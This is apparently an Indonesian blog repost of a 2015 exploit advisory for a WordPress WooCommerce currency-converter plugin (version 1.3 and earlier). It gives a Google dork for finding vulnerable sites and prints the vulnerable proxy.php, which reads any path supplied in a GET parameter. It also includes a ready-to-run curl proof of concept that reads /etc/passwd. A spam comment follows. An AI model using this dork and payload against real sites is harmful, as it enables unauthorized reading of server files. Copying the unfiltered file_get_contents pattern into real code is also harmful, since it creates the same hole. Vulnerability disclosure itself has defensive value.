Judul : WordPress Paypal Currency Converter Basic For Woocommerce 1.3 File Read
WordPress Paypal Currency Converter Basic For Woocommerce 1.3 File Read
 |
| WordPress Paypal Currency Converter Basic For Woocommerce 1.3 File Read |
# Exploit Title: Paypal Currency Converter Basic For Woocommerce File Read
# Google Dork: inurl:"paypal-currency-converter-basic-for-woocommerce"
# Date: 10/06/2015
# Exploit Author: Kuroi'SH
# Software Link:
https://wordpress.org/plugins/paypal-currency-converter-basic-for-woocommerce/
# Version: <=1.3
# Tested on: Linux
Description:
proxy.php's code:
<?php
$file = file_get_contents($_GET['requrl']);
$left=strpos($file,'<div id=currency_converter_result>');
$right=strlen($file)-strpos($file,'<input type=hidden name=meta');
$snip= substr($file,$left,$right);
echo $snip;
?>
Based on user input, the content of a file is printed out (unfortunately
not included) so any html file can be loaded, and an attacker may be able
to read any local file which
is not executed in the server.
Example:
http://localhost/wp-content/plugins/paypal-currency-converter-basic-for-woocommerce/proxy.php?requrl=/etc/passwd
POC:
curl --silent --url
http://localhost/wp-content/plugins/paypal-currency-converter-basic-for-woocommerce/proxy.php?requrl=/etc/passwdDemikianlah Artikel WordPress Paypal Currency Converter Basic For Woocommerce 1.3 File Read
Sekian artikel WordPress Paypal Currency Converter Basic For Woocommerce 1.3 File Read , mudah-mudahan bisa memberi manfaat untuk anda semua. baiklah, sekian postingan kali ini.
Your website is really cool and this is a great inspiring article. money converter
ReplyDelete